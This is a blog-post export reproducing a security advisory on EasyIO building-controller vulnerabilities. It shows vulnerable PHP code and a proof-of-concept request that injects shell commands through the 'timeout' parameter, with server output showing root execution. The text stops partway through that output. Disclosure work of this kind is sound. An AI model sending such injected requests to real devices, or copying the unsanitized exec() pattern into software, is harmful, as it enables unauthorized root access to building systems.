{"id":6272,"date":"2017-01-23T14:07:50","date_gmt":"2017-01-23T22:07:50","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-123\/"},"modified":"2017-01-23T14:07:50","modified_gmt":"2017-01-23T22:07:50","slug":"news-123","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-123\/","title":{"rendered":"SSD Advisory &#8211; EasyIO Multiple Vulnerabilities"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong><u>Vulnerability Summary<\/u><\/strong><\/p>\n<p>The following advisory describes three (3) vulnerabilities that allow to an attacker to gain unauthenticated remote code execution. EasyIO provides products for Building Energy Management Systems. Low costs, high energy savings. <\/p>\n<p>The three vulnerabilities found in EasyIO include:<\/p>\n<ul>\n<li>Unauthenticated remote code execution<\/li>\n<li>Unauthenticated database file download<\/li>\n<li>Authenticated directory traversal vulnerability<\/li>\n<\/ul>\n<p>The vulnerability affected the following products:<\/p>\n<ul>\n<li>EasyIO FG Series, FG32<\/li>\n<li>EasyIO FG Series, FG20<\/li>\n<\/ul>\n<p><strong><u>Credit<\/u><\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><span id=\"more-2908\"><\/span><\/p>\n<p><strong><em>Unauthenticated remote code execution vulnerability<\/em><\/strong><\/p>\n<p><em><u>Vulnerable code<\/u>:<\/em><br \/> The <em>%timeout<\/em> parameter lack sanity check. The <em>$timeout<\/em> parameter will be executed as input from user. an attacker can insert malicious content to the <em>$timeout<\/em> parameter and log as root<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c05b742605069\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> {&#8220;data&#8221;: &#8220;&lt;?php  \/\/vim: ts=2 sw=2    class BacnetController {  \tpublic function run() {  \t\tsession_start();    \t\t$method = $_SERVER[&#8216;REQUEST_METHOD&#8217;];  \t\tif ($method == &#8220;POST&#8221;) {  \t\t\t\t$this-&gt;doPost();  \t\t}  \t\telse if ($method == &#8220;GET&#8221;) {  \t\t\t$this-&gt;doGet();  \t\t}  \t}      \tprotected function doGet() {  \t\t$action = $_GET[&#8216;action&#8217;];  \t\t$response = array();  \t\tif ($action == &#8216;discoverDevices&#8217;) {  \t\t\t$lowLimit = $_GET[&#8216;lowLimit&#8217;];  \t\t\t$highLimit = $_GET[&#8216;highLimit&#8217;];  \t\t\t$timeout = $_GET[&#8216;timeout&#8217;]; \/\/1 vuln parameter  \t\t\t$cmd = &#8216;bacnet device -d all &#8216; . $lowLimit . &#8216; &#8216; . $highLimit . &#8216; &#8216; . $timeout; \/\/2  \t\t\t\/\/ $cmd = &#8216;bacnet device -d mstp &#8216; . $lowLimit . &#8216; &#8216; . $highLimit . &#8216; &#8216; . $timeout;  \t\t\t$output = array();  \t\t\texec($cmd, $output); \/\/3    \t\t\tarray_push($response, &#8216;SUCCESS:&#8217;, &#8221;);  \t\t\t$response = array_merge($response, $output);  \t\t\tdie(implode(&#8221;  \t\t\t&#8220;, $response));  \t\t}  \t\telse if ($action == &#8216;discoverObjects&#8217;) {  \t\t\t$deviceId = $_GET[&#8216;deviceId&#8217;];  \t\t\t$linkType = $_GET[&#8216;linkType&#8217;];  \t\t\tif (strcasecmp($linkType, &#8220;MSTP&#8221;) == 0)  \t\t\t\t$cmd = &#8216;bacnet point -d mstp &#8216; . $deviceId;  \t\t\telse if (strcasecmp($linkType, &#8220;B\/IP&#8221;) == 0 || strcasecmp($linkType, &#8220;IP&#8221;) == 0)  \t\t\t\t$cmd = &#8216;bacnet point -d ip &#8216; . $deviceId;  \t\t\telse {  \t\t\t\terror_log(&#8220;invalid link type: &#8221; . $linkType);  \t\t\t\t$cmd = &#8216;bacnet point -d mstp &#8216; . $deviceId;  \t\t\t}    \t\t\t$output = array();  \t\t\texec($cmd, $output);    \t\t\tarray_push($response, &#8216;SUCCESS:&#8217;, &#8221;);  \t\t\t$response = array_merge($response, $output);  \t\t\tdie(implode(&#8221;  \t\t\t&#8220;, $response));  \t\t}   \t\telse  \t\t\tdie(&#8216;ERROR: not supported action: &#8216; . $action);  \t}    \tprotected function doPost() {  \t}  }        $controller = new BacnetController();  $controller-&gt;run();    ?&gt;  &#8220;,&#8221;actionPermitted&#8221;: &#8220;true&#8221;,&#8221;home_page&#8221;: &#8220;&#8221;}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0117 seconds] -->  <\/p>\n<p><u><em>Proof of Concept<\/em><\/u><\/p>\n<p>An attacker sending the following request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c06a006394427\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/sdcard\/cpt\/scripts\/bacnet.php?action=discoverDevices&amp;lowLimit=0&amp;highLimit=0&amp;timeout=0%26whoami%26uname%20-a%26ls HTTP\/1.1  Host: 192.168.0.16  Accept: application\/json, text\/javascript, *\/*; q=0.01  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/49.0.2623.75 Safari\/537.36  Referer: http:\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr  Accept-Encoding: gzip, deflate, sdch  Accept-Language: en-US,en;q=0.8  Connection: close  Content-Length: 1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06a006394427-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06a006394427-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06a006394427-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06a006394427-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06a006394427-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06a006394427-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06a006394427-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06a006394427-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06a006394427-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06a006394427-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06a006394427-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sdcard<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cpt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">scripts<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bacnet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">discoverDevices<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lowLimit<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">highLimit<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">timeout<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26whoami<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26uname<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06a006394427-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.0.16<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06a006394427-3\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">javascript<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.01<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06a006394427-4\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06a006394427-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AppleWebKit<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">KHTML<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">49.0.2623.75<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Safari<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06a006394427-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06a006394427-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06a006394427-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06a006394427-9\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06a006394427-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p>Will receive from the server the following response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c06d206476314\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Date: Mon, 07 Mar 2016 08:31:43 GMT  Server: Embedthis-Appweb\/3.3.2  Content-Length: 175  Content-Type: text\/html  Connection: close  Pragma: no-cache  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  Last-Modified: Mon, 07 Mar 2016 08:31:43 GMT  Content-type: text\/html  X-Powered-By: PHP\/5.3.10  Expires: Thu, 19 Nov 1981 08:52:00 GMT  Set-Cookie: PHPSESSID=f694a07ca04f27cea0dffa9e6a44ade1; path=\/    root  Linux FG32-20 2.6.29.2-V2.8 #36 Wed Nov 12 15:06:43 EST 2014 armv4tl unknown  !!bacnet: Timeout is out of (1 ~ 43200) range  bacnet.php  deployment.php  os_info.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c06d206476314-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c06d206476314-20\">20<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-3\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Embedthis<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Appweb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">3.3.2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">175<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-6\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-7\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-8\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">must<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">revalidate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-9\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">html<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-11\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.3.10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-12\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Nov<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1981<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-13\"><span class=\"crayon-v\">Set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 